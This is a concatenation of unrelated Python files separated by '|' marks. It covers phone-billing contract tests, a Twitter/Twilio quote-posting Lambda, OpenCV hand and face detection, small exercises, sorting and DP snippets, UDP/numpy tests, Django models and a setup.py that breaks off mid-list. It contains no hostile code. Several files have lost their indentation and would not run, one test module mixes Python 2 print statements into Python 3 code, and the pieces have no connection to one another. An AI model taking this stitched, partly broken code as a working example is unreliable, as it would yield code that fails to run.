            elif line['number'] == '001-2011': # Prepaid: mixed balance
                contract = PrepaidContract(datetime.date(2018, 11, 1), 25)
            elif line['contract'] == 'prepaid':
                # start with $100 credit on the account
                contract = PrepaidContract(datetime.date(2018, 11, 1), 100)
            elif line['contract'] == 'mtm':
                contract = MTMContract(datetime.date(2018, 11, 1))
            elif line['contract'] == 'term':
                contract = TermContract(datetime.date(2018, 11, 1),
                                        datetime.date(2019, 6, 25))
            else:
                print("ERROR: unknown contract type")
            # rebinds the loop variable `line` from dict to PhoneLine
            line = PhoneLine(line['number'], contract)
            customer.add_phone_line(line)
        customer_list.append(customer)
    return customer_list
def test_term_contract() -> None:
    """Exercise TermContract billing: free minutes, and cancellation
    after / on / before the contract end date."""
    log = create_log()
    customers = create_customers(log)
    process_event_history(log, customers)
    for cust in customers:
        if cust.get_id() == 1200:
            for p_line in cust._phone_lines:
                if p_line.number == '100-1200': #Test Free Min
                    bill_summary = p_line.get_bill(11, 2018)
                    assert bill_summary['type'] == 'TERM'
                    assert bill_summary['fixed'] == 320.00
                    assert bill_summary['free_mins'] == 90
                    assert bill_summary['billed_mins'] == 0
                    assert bill_summary['min_rate'] == 0.1
                    assert bill_summary['total'] == 320
                    bill_summary = p_line.get_bill(12, 2018)
                    assert bill_summary['fixed'] == 20.00
                    assert bill_summary['free_mins'] == 100
                    assert bill_summary['billed_mins'] == 0
                    assert bill_summary['total'] == 20.00
                    bill_summary = p_line.get_bill(1, 2019)
                    assert bill_summary['type'] == 'TERM'
                    assert bill_summary['fixed'] == 20.00
                    assert bill_summary['free_mins'] == 100
                    assert bill_summary['billed_mins'] == 50
                    assert bill_summary['min_rate'] == 0.1
                    assert bill_summary['total'] == 25.00
            #Test Cancel After
            for line in cust._phone_lines:
                if line.number == '200-1200':
                    # deposit refunded: net credit to the customer
                    assert cust.cancel_phone_line(line.number) == -280
                    break
        elif cust.get_id() == 2101:
            # Test Cancel On
            for line in cust._phone_lines:
                if line.number == '100-2101':
                    assert cust.cancel_phone_line(line.number) == 20
                    break
        elif cust.get_id() == 3111:
            # Test Cancel Before
            for line in cust._phone_lines:
                if line.number == '100-3111':
                    # deposit forfeited: customer owes the final bill
                    assert cust.cancel_phone_line(line.number) == 24
                    break
def test_mtm_contract() -> None:
    """Exercise MTMContract billing across three months with an
    increasing number of billed minutes (see create_log's '010-1020')."""
    log = create_log()
    customers = create_customers(log)
    process_event_history(log, customers)
    for cust in customers:
        if cust.get_id() == 1020:
            for p_line in cust._phone_lines:
                if p_line.number == '010-1020': #Test different number of cals
                    bill_summary = p_line.get_bill(11, 2018)
                    assert bill_summary['type'] == 'MTM'
                    assert bill_summary['billed_mins'] == 910
                    assert bill_summary['min_rate'] == 0.05
                    assert bill_summary['total'] == 95.5
                    bill_summary = p_line.get_bill(12, 2018)
                    assert bill_summary['type'] == 'MTM'
                    assert bill_summary['billed_mins'] == 1820
                    assert bill_summary['min_rate'] == 0.05
                    assert bill_summary['total'] == 141
                    bill_summary = p_line.get_bill(1, 2019)
                    assert bill_summary['type'] == 'MTM'
                    assert bill_summary['billed_mins'] == 2730
                    assert bill_summary['min_rate'] == 0.05
                    assert bill_summary['total'] == 186.5
def test_prepaid_contract() -> None:
    """Exercise PrepaidContract billing with balances that go positive
    ('001-2101') and stay negative ('001-3111')."""
    log = create_log()
    customers = create_customers(log)
    process_event_history(log, customers)
    for cust in customers:
        if cust.get_id() == 2101:
            for p_line in cust._phone_lines:
                if p_line.number == '001-2101': #Test different starting balance
                    bill_summary = p_line.get_bill(11, 2018)
                    assert bill_summary['type'] == 'PREPAID'
                    assert bill_summary['billed_mins'] == 1000
                    assert bill_summary['min_rate'] == 0.025
                    assert bill_summary['total'] == 0
                    bill_summary = p_line.get_bill(12, 2018)
                    assert bill_summary['type'] == 'PREPAID'
                    assert bill_summary['billed_mins'] == 2000
                    assert bill_summary['min_rate'] == 0.025
                    assert bill_summary['total'] == 25
                    bill_summary = p_line.get_bill(1, 2019)
                    assert bill_summary['type'] == 'PREPAID'
                    assert bill_summary['billed_mins'] == 1500
                    assert bill_summary['min_rate'] == 0.025
                    assert bill_summary['total'] == 37.5
        elif cust.get_id() == 3011:
            # NOTE(review): no customer id 3011 appears in the fixture data
            # above ('001-3111' suggests 3111) -- confirm this branch runs.
            for p_line in cust._phone_lines:
                if p_line.number == '001-3111': #Test different starting balance
                    bill_summary = p_line.get_bill(11, 2018)
                    assert bill_summary['type'] == 'PREPAID'
                    assert bill_summary['billed_mins'] == 100
                    assert bill_summary['min_rate'] == 0.025
                    assert bill_summary['total'] == -22.5
                    assert bill_summary['free_mins'] == 0
                    bill_summary = p_line.get_bill(12, 2019)
                    assert bill_summary['type'] == 'PREPAID'
                    assert bill_summary['billed_mins'] == 50
                    assert bill_summary['min_rate'] == 0.025
                    assert bill_summary['total'] == -21.25
                    assert bill_summary['free_mins'] == 0
                    bill_summary = p_line.get_bill(1, 2019)
                    assert bill_summary['type'] == 'PREPAID'
                    assert bill_summary['billed_mins'] == 150
                    assert bill_summary['min_rate'] == 0.025
                    assert bill_summary['total'] == -17.5
                    assert bill_summary['free_mins'] == 0
def test_monthly_bill() -> None:
    """Check each customer's combined monthly bill totals.

    Fix: every `elif` compared the *bound method* `cust.get_id` to an
    int (missing call parentheses), which is always False, so only the
    id-1200 branch ever executed; all comparisons now call get_id().
    """
    log = create_log()
    customers = create_customers(log)
    process_event_history(log, customers)
    for cust in customers:
        if cust.get_id() == 1200:
            assert cust.generate_bill(11, 2018)[1] == 320 + 320
            assert cust.generate_bill(12, 2018)[1] == 20 + 20
            assert cust.generate_bill(1, 2019)[1] == 25 + 20
        elif cust.get_id() == 1020:
            assert cust.generate_bill(11, 2018)[1] == 95.5 + 50.7
            assert cust.generate_bill(12, 2018)[1] == 141 + 50.7
            assert cust.generate_bill(1, 2019)[1] == 186.5 + 50.7
        elif cust.get_id() == 1002:
            assert cust.generate_bill(11, 2018)[1] == 2*-99.65
            assert cust.generate_bill(12, 2018)[1] == 2*-99.3
            assert cust.generate_bill(1, 2019)[1] == 2*-98.95
        elif cust.get_id() == 2110:
            assert cust.generate_bill(11, 2018)[1] == 320*2
            assert cust.generate_bill(12, 2018)[1] == 20*2
            assert cust.generate_bill(1, 2019)[1] == 20*2
        elif cust.get_id() == 2101:
            assert cust.generate_bill(11, 2018)[1] == 320
            assert cust.generate_bill(12, 2018)[1] == 20 + 25
            assert cust.generate_bill(1, 2019)[1] == 20 + 37.5
        elif cust.get_id() == 2011:
            assert cust.generate_bill(11, 2018)[1] == 50.7 - 12.5
            assert cust.generate_bill(12, 2018)[1] == 50.7 + 12.5
            assert cust.generate_bill(1, 2019)[1] == 50.7 - 10
        elif cust.get_id() == 3111:
            assert cust.generate_bill(11, 2018)[1] == 324 + 50.7 - 22.5
            assert cust.generate_bill(12, 2018)[1] == 24 + 50.7 - 21.25
            assert cust.generate_bill(1, 2019)[1] == 24 + 50.7 - 17.5
if __name__ == '__main__':
    # Run this module's tests under pytest.
    # NOTE(review): targets 'task3_tests.py' although the header says
    # "Task 1 Tests" -- confirm the filename matches this file.
    pytest.main(['task3_tests.py'])
|
# Andrew Cargill
# Game Night Tweeter
# 2021-06-01 - v2.1 - Migrating From SNS to Twilio To Send SMS Messages
import base64
import boto3
import os
import random
import requests
import twitter
# AWS Constants
# All configuration comes from environment variables; a missing variable
# raises KeyError at import time (fail fast on misconfiguration).
BUCKET_NAME = os.environ['BUCKET_NAME']  # S3 bucket holding quotes.txt

# Twitter Constants
ACCESS_KEY_TOKEN = os.environ['ACCESS_KEY_TOKEN']
ACCESS_TOKEN_SECRET = os.environ['ACCESS_TOKEN_SECRET']
CONSUMER_KEY = os.environ['CONSUMER_KEY']
CONSUMER_SECRET = os.environ['CONSUMER_SECRET']

# Twilio Constants
TWILIO_ACCOUNT_SID = os.environ['TWILIO_ACCOUNT_SID']
TWILIO_AUTH_TOKEN = os.environ['TWILIO_AUTH_TOKEN']
TWILIO_PHONE_NUMBER = os.environ['TWILIO_PHONE_NUMBER']
MY_PHONE_NUMBER = os.environ['MY_PHONE_NUMBER']  # SMS alert recipient
def get_auth_header():
    """Build the HTTP Basic auth header value for the Twilio REST API."""
    credentials = TWILIO_ACCOUNT_SID + ":" + TWILIO_AUTH_TOKEN
    encoded = base64.b64encode(credentials.encode("ascii")).decode("ascii")
    return "Basic " + encoded
def send_twilio_sms(message):
    """Send `message` as an SMS to MY_PHONE_NUMBER via Twilio's REST API.

    Fix: the payload was hand-concatenated into a string without URL
    encoding, so any message containing '&', '=', '+' etc. was corrupted
    or broke the request.  Passing a dict lets requests form-encode it
    (and set Content-Type: application/x-www-form-urlencoded) correctly.
    """
    url = "https://api.twilio.com/2010-04-01/Accounts/" + TWILIO_ACCOUNT_SID + "/Messages"
    payload = {
        "To": MY_PHONE_NUMBER,
        "From": TWILIO_PHONE_NUMBER,
        "Body": message,
    }
    headers = {
        "Authorization": get_auth_header(),
    }
    response = requests.request("POST", url, headers = headers, data = payload)
    print(response.text)
def twitter_post(quote):
    """Post `quote` as a tweet using the configured app credentials."""
    client = twitter.Api(consumer_key = CONSUMER_KEY,
                         consumer_secret = CONSUMER_SECRET,
                         access_token_key = ACCESS_KEY_TOKEN,
                         access_token_secret = ACCESS_TOKEN_SECRET)
    posted = client.PostUpdate(quote)
    print(posted.text)
def lambda_handler(event, context):
    """AWS Lambda entry point: pop one random quote from
    s3://BUCKET_NAME/quotes.txt, tweet it, and write the shrunken file
    back to S3; sends me an SMS instead when the file is empty.
    `event` and `context` are unused."""
    s3 = boto3.resource('s3')
    s3.Bucket(BUCKET_NAME).download_file("quotes.txt", "/tmp/quotes.txt")
    quotes_file = "/tmp/quotes.txt"
    with open(quotes_file, "r", encoding = "utf-8") as rf:
        quotes = rf.read()
    # keep only non-blank lines
    quote_list = [_f for _f in quotes.splitlines() if _f]
    if quote_list: # If quote_list contains items
        # remove a random quote from the pool and post it
        quote = quote_list.pop(random.randrange(len(quote_list)))
        twitter_post(quote)
    else:
        message = "The quote well's run dry!"
        send_twilio_sms(message)
    # persist the remaining quotes back to S3 (unchanged when empty)
    with open(quotes_file, "w", encoding = "utf-8") as wf:
        wf.write("\n".join(quote_list))
    s3.meta.client.upload_file(quotes_file, BUCKET_NAME, "quotes.txt")
|
"""
Returns the iterable 'iter' with the value 'val'
added to its front and back.
i.e., surround(['a', 'b'], 'c') will return ['c', 'a', 'b', 'c']
"""
def surround(iter, val):
iter.append(val)
iter.insert(0, val)
return iter
"""
Returns a list of items from the dictionary 'dicti'
where the key is equal to the value.
i.e. same_key_vals({"a": 1, "b" : "b", "c": 2, "d": "d"})
will return ['b', 'd']
"""
def same_key_vals(dicti):
l = list()
for key, value in dicti.items():
if key == value:
l.append(key)
return l
"""
If the key 'gene' is present in the dictionary 'dicti'
remove it from the dictionary,
otherwise add the key/value pair 'gene': 'cool'
to the dictionary. Either way, return the new dictionary
i.e. add_gene_key({'a': 1}) will return {'a': 1, 'gene': 'cool'}
and add_gene_key({'gene': 'butt', 'b': False}) will return {'b': False}.
"""
def add_gene_key(dicti):
if 'gene' in dicti:
del dicti['gene']
else:
dicti['gene'] = 'cool'
print(dicti)
return dicti
"""
Return the first and last item of the iterable passed.
i.e., first_and_last([1, 2, 3, 4, 5]) will return [1, 5]
"""
def first_and_last(iterable):
return iterable[0], iterable[-1]
"""
Return True if the integer is odd, False if the integer is even.
0 is considered "odd".
i.e. is_odd(1) is True
is_odd(-2) is False
is_odd(0) is True
"""
def is_odd(integer):
if integer == 0:
return True
elif integer % 2 == 0:
return False
else:
return True |
# Day 8: Dictionaries and Maps
# Learn about key-value pair mappings using a Map or a Dictionary structure
# Given n names and phone numbers, assemble a phone book that maps
# friend's names to their respective phone numbers
# Query for names and print "name=phoneNumber" for each line, if not found
# print "Not found"
# Note: Continues to read lines until EOF.
import sys
n = int(raw_input().strip())
phone_book = {}
for i in range(n): # range max in not inclusive
info_array = list(raw_input().strip().split())
# Build dictionary structure
phone_book[info_array[0]] = info_array[1]
print info_array
print phone_book
# for line in sys.stdin:
# name = line.strip()
# if name in phone_book:
# print '%s=%s' % (name, phone_book[name])
# else:
# print "Not found"
while True:
try:
name = raw_input()
if name in phone_book:
print "%s=%s" % (name, phone_book[name])
else:
print 'Not Found'
except:
break
|
# Print each number except those strictly between 5 and 9 (6, 7, 8).
lista_de_weas = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]
for numero_de_wea in lista_de_weas:
    if not (5 < numero_de_wea < 9):
        print(numero_de_wea)
import cv2
import numpy as np
import random
class HandPartClassifier:
    """Heuristics for cleaning and visualising per-pixel hand-part label
    images.  NOTE: legacy Python 2 code (xrange, integer division)."""

    @staticmethod
    def showClassImage(window_name, inputImage):
        """Render a single-channel class-label image as random colors in
        `window_name` and return the BGR visualisation (label 0 = black)."""
        height = inputImage.shape[0]
        width = inputImage.shape[1]
        classMap = np.zeros((height, width, 3), np.uint8)
        colorMap = {}
        for i in xrange(height):
            for j in xrange(width):
                c = inputImage[i, j]
                if c == 0:
                    # background stays black
                    continue
                if not c in colorMap:
                    # assign each class a random BGR color on first sight
                    colorMap[c] = (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))#colorArray[c % COLOR_NUM];
                color = colorMap[c];
                classMap[i, j, 0] = color[0]
                classMap[i, j, 1] = color[1]
                classMap[i, j, 2]= color[2]
        cv2.imshow(window_name, classMap);
        return classMap
#not all of the pixel values are either 0 or 255, some of them may be 1, 2, 3, or 252 and so on.
@staticmethod
def fixImage(inputImage, lower_value, upper_value):
    """Binarize inputImage so stray intermediate pixel values (1, 2, 252,
    ...) snap to 0 / upper_value: pixels above lower_value become
    upper_value, the rest 0.

    Fix: the original used the C++ signature
    cv2.threshold(src, dst, ...) and an unqualified THRESH_BINARY, which
    raises NameError (and ignores the return) in Python.  The Python API
    is: retval, dst = cv2.threshold(src, thresh, maxval, type).
    """
    _, inputImage = cv2.threshold(inputImage, lower_value, upper_value, cv2.THRESH_BINARY)
    return inputImage
@staticmethod
def findLength(inputImage, x, y):
    """Return (run_length, left, right): the horizontal run on row y of
    pixels sharing the class label at (x, y), with inclusive bounds."""
    currentClass = inputImage[y, x]
    length = 1  # NOTE(review): unused; the length is recomputed on return
    left = x
    right = x
    width = inputImage.shape[1]
    # walk left while the label matches
    while left >= 0:
        if inputImage[y, left] == currentClass:
            left -= 1
        else:
            break
    # walk right while the label matches
    while right < width:
        if inputImage[y, right] == currentClass:
            right += 1
        else:
            break
    # both loops overshoot by one; pull the bounds back in
    left += 1
    right -= 1
    return right - left + 1, left, right
@staticmethod
def fillLine(inputImage, y, left, right, class_num):
for i in xrange(left, right + 1):
inputImage[y, i] = class_num
return inputImage
@staticmethod
def bottomUp(inputImage):
'''
scan from bottom to top to decide which class it belongs to
'''
prev_class = 0;
current_class = 0;
prev_left = 0
prev_right = 0
current_left = 0
current_right = 0
prev_length = 0
current_length = 0
width = inputImage.shape[1]
height = inputImage.shape[0]
palm_length = width
palm_class = 0
has_hand = False
for j in xrange(0, width):
prev_class = inputImage[height - 1, width / 2]
if not has_hand:
temp_length, prev_left, prev_right = HandPartClassifier.findLength(inputImage, j, height - 1);
if temp_length > palm_length / 2 :
palm_class = prev_class
has_hand = True
palm_length = temp_length
#index begins from number of rows - 2 to 0
for i in reversed(xrange(0, height - 2)):
prev_class = inputImage[i + 1 , j]
current_class = inputImage[i, j]
if prev_class != current_class and prev_class != 0 and current_class != 0 :
current_length, current_left, current_right = HandPartClassifier.findLength(inputImage,j, i)
if prev_class == palm_class and current_length * 1.0 / palm_length < 0.2:
continue
prev_length, prev_left, prev_right = HandPartClassifier.findLength(inputImage, j, i + 1);
ratio = current_length * 1.0 / prev_length;
if (ratio > 0.5) or ratio < 0.1 or current_right - current_left < 5 :
inputImage = HandPartClassifier.fillLine(inputImage, i, current_left, current_right, prev_class)
return inputImage;
#the first step is to do a rough classification
@staticmethod
def roughClassify(inputImage):
indexArray = [0 for i in xrange(256)]
classArray = [0 for i in xrange(256)]
prev_color = 0
current_color = 0
startIndex = 0
endIndex = 0
height = inputImage.shape[0]
width = inputImage.shape[1]
current_class = 1
for i in xrange(height):
prev_color = inputImage[i, 0]
if prev_color == 255:
startIndex = 0
for j in xrange(width):
current_color = inputImage[i, j];
if prev_color == 0 and current_color == 255:
startIndex = j
if prev_color == 255 and current_color == 0:
#here we do back trace
endIndex = j - 1
current_class += 1
if current_class == 256:
current_class = 1
if current_color == 255:
inputImage[i, j] = current_class
prev_color = current_color
return inputImage
@staticmethod
def classifyHandParts(inputImage):
#fix the noise points
#inputImage = fixImage(inputImage)
inputImage = HandPartClassifier.roughClassify(inputImage)
#the season that we have to scan twice it to
#avoid discontinuity. you can try scaning once
#to see what will happen
inputImage = HandPartClassifier.bottomUp(inputImage)
inputImage = HandPartClassifier.bottomUp(inputImage)
HandPartClassifier.showClassImage('classImage', inputImage)
return inputImage
|
# -*- coding:utf-8 -*-
""" 数字游戏
让a[i]和b[i],关于b降序排列。减少得多的先被擦掉,就可以让剩下的和尽可能的大
dp[i][j]表示前i个数字在第j轮的时候的最大取值
dp[i][j] = max(dp[i-1][j], dp[i-1][j-1]+a[i]-b[i]*(j-1))"""
# O(n log n)
def max_num(a, b, m, dp):
    """Fill the DP table and return the best total after m rounds.

    Items are processed in descending order of their decrease b[i], so the
    fastest-shrinking numbers are taken in the earliest rounds.  dp[i][j] is
    the best value using the first i (sorted) items at round j:
    dp[i][j] = max(dp[i-1][j], dp[i-1][j-1] + a[i] - b[i]*(j-1)).
    """
    ordered = sorted(zip(a, b), key=lambda pair: pair[1], reverse=True)
    for i, (value, decay) in enumerate(ordered, 1):
        for j in range(1, m + 1):
            dp[i][j] = max(dp[i - 1][j], dp[i - 1][j - 1] + value - decay * (j - 1))
    return dp[len(ordered)][m]
def main():
    """Read the number sequence, per-round decreases and round count from
    stdin, then print the maximum achievable total.

    Example: sequence 10 20 30, decreases 4 5 6, 3 rounds -> prints 47.
    """
    a = input("输入原序列:")
    b = input("输入下降数值:")
    m = int(input("输入轮数:"))
    a = list(map(int, a.split()))
    b = list(map(int, b.split()))
    # FIX: dp is indexed dp[i][j] with i in 0..len(a) and j in 0..m, so it
    # needs len(a)+1 rows of m+1 columns each.  The original had the two
    # dimensions swapped, which breaks whenever len(a) != m.
    dp = [[0] * (m + 1) for _ in range(len(a) + 1)]
    print("最大值为:", max_num(a, b, m, dp))
if __name__ == '__main__':
    # Interactive entry point: prompts on stdin when run as a script.
    main()
import math
import mathutils
def correct_ges_rotation(rot: mathutils.Vector):
    """Fix up a GES rotation vector in place: add pi (180 degrees) to X and
    flip the sign of Y and Z — presumably converting between the GES and
    Blender axis conventions (confirm against the callers)."""
    rot.x = rot.x + math.pi
    rot.y = -rot.y
    rot.z = -rot.z
|
from .augmentation import *
from .helper import *
#from .trainer import *
from .loss import *
from .metrics import *
from .download import * |
# -*- coding:utf-8 -*-
'''
选择排序算法:
基于比较的排序算法
将数据分为已排区间和未排区间
从未排区间中遍历出最小值及其索引
将其和当前遍历的索引位置互换
'''
def SelectionSort(arr):
    """In-place ascending selection sort.

    Repeatedly locate the smallest element of the unsorted tail and swap it
    into the current position.  O(n^2) comparisons, O(1) extra space.
    """
    n = len(arr)
    for pos in range(n):
        smallest = min(range(pos, n), key=arr.__getitem__)
        arr[pos], arr[smallest] = arr[smallest], arr[pos]
if __name__ == '__main__':
    # Smoke test: sort a small sample in place and print the result.
    arr = [9,3,5,-1,1,4,0]
    SelectionSort(arr)
    print(arr)
|
import cv2
# import imutils
import numpy as np
def simple_return(image):
    """No-op transform: hand the frame back unchanged."""
    return image
def crop_image(image):
    """Return the top-left 350x350 region of the image."""
    return image[:350, :350]
detector = cv2.CascadeClassifier('image_processing/cascades/haarcascade_frontalface_default.xml')
def face_detection(image, rect_color, rotation):
    """Detect faces and draw rectangles on a copy of the input frame.

    image: BGR frame; rect_color: BGR tuple for the rectangles;
    rotation: 90 / -90 rotates the frame upright before detection and rotates
    the annotated result back afterwards.  Returns (annotated_image,
    faceRects); note faceRects stays in the coordinates of the downscaled
    detection image, not the original resolution.
    """
    # Rotate the frame upright so the cascade sees faces the right way up.
    if rotation == 90:
        image = cv2.rotate(image, cv2.ROTATE_90_COUNTERCLOCKWISE)
    if rotation == -90:
        image = cv2.rotate(image, cv2.ROTATE_90_CLOCKWISE)
    orig_image = image.copy()
    height, width = orig_image.shape[:2]
    # Downscale to a fixed 300px width for faster detection; keep the ratio
    # so the boxes can be mapped back to full resolution afterwards.
    new_width = 300
    r = new_width / float(width)
    dim = (new_width, int(height * r))
    ratio = (width / dim[0], height / dim[1])
    image = cv2.resize(image, dim)
    image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    faceRects = detector.detectMultiScale(image, scaleFactor=1.2, minNeighbors=5,
                                          minSize=(20, 20), flags=cv2.CASCADE_SCALE_IMAGE)
    for (x, y, w, h) in faceRects:
        # Scale the box back to original resolution.  (w, h) are converted to
        # the absolute bottom-right corner here — the order matters since the
        # scaled x/y are reused in the computation.
        x = int(x * ratio[0])
        y = int(y * ratio[1])
        w = x + int(w * ratio[0])
        h = y + int(h * ratio[1])
        cv2.rectangle(orig_image, (x, y), (w, h), rect_color, 2)
    # Undo the initial rotation so the annotated frame matches the input.
    if rotation == 90:
        orig_image = cv2.rotate(orig_image, cv2.ROTATE_90_CLOCKWISE)
    if rotation == -90:
        orig_image = cv2.rotate(orig_image, cv2.ROTATE_90_COUNTERCLOCKWISE)
    return orig_image, faceRects
|
import pytest
import os
import sys
import threading
from pprint import pprint
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from utils import *
def test_listen_func():
    """Exercise utils.listen_func end-to-end over a local UDP socket.

    Starts the listener in a daemon thread, sends pickled (key, value)
    messages terminated by the ('0', 'exit') sentinel, and checks that
    everything sent before the sentinel ends up in msgs (and nothing after).
    """
    # The agent's IP
    IP = '127.0.0.1'
    # The port where the agent listens for messages
    PORT = 5005
    listening_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    print('Listening socket created')
    listening_socket.bind((IP, PORT))
    print('Listening socket bound to port')
    print("%s:%d" % (IP, PORT))
    msgs = {}
    listen = threading.Thread(target=listen_func, args=(msgs, listening_socket), kwargs={'agent': None})
    # FIX: Thread.setDaemon() is deprecated (Python 3.10+); assign the
    # daemon attribute instead.
    listen.daemon = True
    listen.start()
    listening_socket.sendto(pickle.dumps(('greeting', "Kiss kiss to you too")), ("127.0.0.1", 5005))
    listening_socket.sendto(pickle.dumps(('name', "Rachel")), ("127.0.0.1", 5005))
    listening_socket.sendto(pickle.dumps(('50', "Montana")), ("127.0.0.1", 5005))
    listening_socket.sendto(pickle.dumps(('food', (125, 'Hamburger'))), ("127.0.0.1", 5005))
    listening_socket.sendto(pickle.dumps(('0', "exit")), ("127.0.0.1", 5005))
    # Sent after the exit sentinel, so it must NOT show up in msgs.
    listening_socket.sendto(pickle.dumps(('ghosts', "shouldn't exist")), ("127.0.0.1", 5005))
    listen.join()
    msgs2 = {'greeting': "Kiss kiss to you too",
             'name': "Rachel",
             '50': "Montana",
             'food': (125, "Hamburger"),
             '0': "exit"
             }
    assert msgs == msgs2
    listening_socket.close()
    print('Listening socket closed')
def test_get_agents_info():
    """get_agents_info should parse the sample agents file into a dict keyed
    by agent id; entry 42 holds the pointer to the root agent."""
    x = get_agents_info("agents-sim-1.txt")
    y = {1: {'IP': '127.0.0.1', 'PORT': '5001', 'is_root': 'True'},
         2: {'IP': '127.0.0.1', 'PORT': '5002'},
         3: {'IP': '127.0.0.1', 'PORT': '5003'},
         4: {'IP': '127.0.0.1', 'PORT': '5004'},
         42: {'root_id': '1'}
         }
    assert x == y
def test_combine():
    """combine(a, b, a_ant, b_ant) merges two tables over their antecedent
    variable tuples: disjoint antecedents broadcast into a higher-rank sum
    table, identical antecedents add element-wise, and shared antecedents are
    aligned (axes reordered to the merged, sorted antecedent tuple)."""
    # Disjoint antecedents (7,) and (9,): outer-sum into a 4x3 table.
    a = np.array([0,1,2,3])
    a_ant = (7,)
    b = np.array([0,1,2])
    b_ant = (9,)
    x, merged_ant = combine(a, b, a_ant, b_ant)
    y = np.array(
        [[0, 1, 2],
        [1, 2, 3],
        [2, 3, 4],
        [3, 4, 5]]
    )
    assert np.array_equal(x, y)
    assert merged_ant == (7, 9)
    a = np.array([0,1,2,3])
    a_ant = (7,)
    b = np.array([0,1,2,3])
    b_ant = (9,)
    x, merged_ant = combine(a, b, a_ant, b_ant)
    y = np.array(
        [[0, 1, 2, 3],
        [1, 2, 3, 4],
        [2, 3, 4, 5],
        [3, 4, 5, 6]]
    )
    assert np.array_equal(x, y)
    assert merged_ant == (7, 9)
    # Identical antecedents: element-wise sum, antecedent unchanged.
    a = np.array([0,1,2,3])
    a_ant = (7,)
    b = np.array([0,1,2,3])
    b_ant = (7,)
    x, merged_ant = combine(a, b, a_ant, b_ant)
    y = np.array([0,2,4,6])
    assert np.array_equal(x, y)
    assert merged_ant == (7,)
    a = np.arange(12).reshape(3,4)
    a_ant = (7,9)
    b = np.arange(12).reshape(3,4)
    b_ant = (7,9)
    x, merged_ant = combine(a, b, a_ant, b_ant)
    y = np.arange(12).reshape(3,4) * 2
    assert np.array_equal(x, y)
    assert merged_ant == (7, 9)
    # Partially overlapping antecedents broadcast into a rank-3 table.
    a = np.arange(12).reshape(3,4)
    a_ant = (8,9)
    b = np.arange(12).reshape(3,4)
    b_ant = (7,9)
    x, merged_ant = combine(a, b, a_ant, b_ant)
    y = np.array([[[ 0, 2, 4, 6],
                   [ 4, 6, 8,10],
                   [ 8,10,12,14]],
                  [[ 4, 6, 8,10],
                   [ 8,10,12,14],
                   [12,14,16,18]],
                  [[ 8,10,12,14],
                   [12,14,16,18],
                   [16,18,20,22]]])
    assert np.array_equal(x, y)
    assert merged_ant == (7, 8, 9)
    # Same variables in different order: axes are aligned before adding.
    a = np.array([[0, 1],
                  [1, 2]])
    a_ant = (9, 7)
    b = np.array([[0, 1],
                  [1, 2]])
    b_ant = (7, 9)
    x, merged_ant = combine(a, b, a_ant, b_ant)
    y = np.array([[0, 2],
                  [2, 4]])
    assert np.array_equal(x, y)
    assert merged_ant == (7, 9)
    a = np.array([-1, -2])
    a_ant = (2,)
    b = np.array([[-3, -4],
                  [-2, -3]])
    b_ant = (2, 1)
    x, merged_ant = combine(a, b, a_ant, b_ant)
    y = np.array([[-4, -4],
                  [-5, -5]])
    # NOTE(review): Python 2 print statements — this module targets
    # Python 2 (or these debug lines predate a py3 port); confirm.
    print 'x:'
    print x
    print 'y:'
    print y
    print 'x_ant:', merged_ant
    print 'y_ant:', (1, 2)
    assert np.array_equal(x, y)
    assert merged_ant == (1, 2)
def test_add_dims():
    """add_dims(table, ant, axis?, new_var, size) should insert a new
    antecedent variable by repeating the table `size` times along a new
    trailing axis, and append the variable id to the antecedent tuple."""
    a = np.arange(4)
    x, ant = add_dims(a, (5,), 1, 8, 3)
    y = np.array(
        [[0,0,0],
         [1,1,1],
         [2,2,2],
         [3,3,3]])
    assert np.array_equal(x, y)
    assert ant == (5, 8)
    a = np.arange(12).reshape(3,4)
    x, ant = add_dims(a, (7, 9), 2, 11, 2)
    y = np.array([[[ 0, 0],
                   [ 1, 1],
                   [ 2, 2],
                   [ 3, 3]],
                  [[ 4, 4],
                   [ 5, 5],
                   [ 6, 6],
                   [ 7, 7]],
                  [[ 8, 8],
                   [ 9, 9],
                   [10, 10],
                   [11, 11]]])
    assert np.array_equal(x, y)
    assert ant == (7, 9, 11)
def test_expand():
    """expand(table, ant, target_ant, target_shape) should broadcast the
    table onto the larger antecedent tuple / shape (here: repeat a length-4
    vector across a new size-3 axis for variable 8)."""
    a = np.arange(4)
    x, ant = expand(a, (5,), (5,8), (4,3))
    y = np.array(
        [[0,0,0],
         [1,1,1],
         [2,2,2],
         [3,3,3]])
    assert np.array_equal(x, y)
    assert ant == (5, 8)
if __name__ == "__main__":
    # Allow running this test module directly instead of via `pytest`.
    pytest.main()
|
from django.db import models
class Autor(models.Model):
    """Author: name and age."""
    nome = models.CharField(max_length = 255)
    idade = models.IntegerField()
    def __str__(self):
        return self.nome
class Editora(models.Model):
    """Publisher: name and an integer rating."""
    nome = models.CharField(max_length = 255)
    avaliacao = models.IntegerField()
    def __str__(self):
        return self.nome
class Livro(models.Model):
    """Book: many-to-many with authors, single publisher (cascade delete)."""
    nome = models.CharField(max_length = 255)
    paginas = models.IntegerField()
    preco = models.DecimalField(max_digits = 10, decimal_places = 2)
    avaliacao = models.FloatField()
    autores = models.ManyToManyField(Autor)
    editora = models.ForeignKey(Editora, on_delete = models.CASCADE)
    data_pub = models.DateField()
    def __str__(self):
        return self.nome
class Loja(models.Model):
    """Store: stocked books plus a non-negative customer count."""
    nome = models.CharField(max_length = 255)
    livros = models.ManyToManyField(Livro)
    quantidade_de_clientes = models.PositiveIntegerField()
    def __str__(self):
        return self.nome
|
# -*- coding:utf-8 -*-
from setuptools import setup
# Packaging metadata for the dbpool distribution.
setup(
    name = 'python-dbpool',
    version = '0.1.0a0',
    author = 'Claus Prüfer',
    author_email = 'pruefer@webcodex.de',
    maintainer = 'Claus Prüfer',
    description = 'A tiny static postgresql database pool for threaded wsgi webserver (apache2).',
    license = 'GPLv3',
    url = 'http://dbpool.python.webcodex.de',
    long_description = open('./README.rst').read(),
    classifiers = [
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        # NOTE(review): 'Topic :: Software Development :: Database Tools'
        # does not appear in the official trove classifier list — verify.
        'Topic :: Software Development :: Database Tools',
        # FIX: 'License :: OSI Approved :: GPLv3 License' is not a registered
        # trove classifier (PyPI rejects unknown classifiers); this is the
        # official spelling.
